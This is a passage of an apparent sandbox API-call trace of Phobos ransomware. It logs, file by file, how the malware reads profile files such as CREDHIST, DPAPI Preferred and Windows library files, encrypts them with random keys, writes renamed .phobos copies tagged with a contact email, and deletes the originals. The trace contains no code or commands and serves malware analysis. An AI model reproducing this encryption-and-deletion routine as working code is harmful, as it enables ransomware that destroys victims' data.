pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.591] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=24) returned 1 [0210.591] CloseHandle (hObject=0x10c) returned 1 [0210.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist")) returned 0x2026 [0210.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.592] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.592] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0210.857] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.857] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18, lpOverlapped=0x0) returned 1 [0210.858] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0210.858] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0210.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0210.859] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.859] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0210.859] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.859] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0210.860] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.860] CloseHandle (hObject=0x10c) returned 1 [0210.860] CloseHandle (hObject=0xac) returned 1 [0210.860] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\credhist")) returned 1 [0210.861] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.861] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.862] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=24) returned 1 [0210.862] CloseHandle (hObject=0xac) returned 1 [0210.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred")) returned 0x2026 [0210.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.863] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.863] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0210.864] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.864] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18, lpOverlapped=0x0) returned 1 [0210.864] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20, dwBufLen=0x20 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x20) returned 1 [0210.864] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x20, lpOverlapped=0x0) returned 1 [0210.865] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0210.865] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.865] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0210.865] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.865] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0210.865] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.865] CloseHandle (hObject=0xac) returned 1 [0210.865] CloseHandle (hObject=0x10c) returned 1 [0210.866] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred")) returned 1 [0210.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.868] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3587) returned 1 [0210.868] CloseHandle (hObject=0x10c) returned 1 [0210.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms")) returned 0x2020 [0210.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.868] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.868] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0210.869] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.869] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe03, lpOverlapped=0x0) returned 1 [0210.892] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe10, dwBufLen=0xe10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe10) returned 1 [0210.892] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe10, lpOverlapped=0x0) returned 1 [0210.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0210.893] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.893] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0210.893] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.893] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0210.893] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.893] CloseHandle (hObject=0x10c) returned 1 [0210.893] CloseHandle (hObject=0xac) returned 1 [0210.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms")) returned 1 [0210.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.895] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3579) returned 1 [0210.895] CloseHandle (hObject=0xac) returned 1 [0210.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms")) returned 0x2020 [0210.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.895] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.895] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0210.896] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.896] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xdfb, lpOverlapped=0x0) returned 1 [0210.909] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe00, dwBufLen=0xe00 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe00) returned 1 [0210.909] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe00, lpOverlapped=0x0) returned 1 [0210.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0210.910] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.910] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0210.910] CryptDestroyKey (hKey=0xa32a28) returned 1 [0210.910] WriteFile (in: hFile=0x10c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0210.910] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.910] CloseHandle (hObject=0xac) returned 1 [0210.910] CloseHandle (hObject=0x10c) returned 1 [0210.910] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms")) returned 1 [0210.911] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0210.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.912] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3558) returned 1 [0210.912] CloseHandle (hObject=0x10c) returned 1 [0210.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms")) returned 0x2020 [0210.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0210.912] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.912] SetFilePointerEx (in: hFile=0x10c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0210.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.913] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32928) returned 1 [0210.913] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0210.913] ReadFile (in: hFile=0x10c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xde6, lpOverlapped=0x0) returned 1 [0211.054] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xdf0, dwBufLen=0xdf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xdf0) returned 1 [0211.054] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xdf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xdf0, lpOverlapped=0x0) returned 1 [0211.055] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0211.055] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0211.055] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0211.055] CryptDestroyKey (hKey=0xa328e8) returned 1 [0211.055] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0211.055] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.055] CloseHandle (hObject=0x10c) returned 1 [0211.055] CloseHandle (hObject=0xac) returned 1 [0211.055] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms")) returned 1 [0211.056] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0211.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.075] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=24) returned 1 [0211.076] CloseHandle (hObject=0x10c) returned 1 [0211.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms")) returned 0x20 [0211.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0211.076] SetFilePointerEx (in: 